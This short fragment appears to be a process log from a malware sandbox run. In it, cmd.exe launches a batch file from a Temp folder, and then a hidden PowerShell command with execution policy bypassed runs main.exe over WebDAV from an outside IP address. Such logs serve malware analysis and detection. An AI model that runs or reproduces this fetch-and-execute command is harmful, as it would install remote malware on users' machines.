cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "HnbFriUQm" C:\Users\test22\AppData\Local\Temp\main.bat
2568powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \\91.207.183.9@8000\DavWWWRoot\main.exe
2728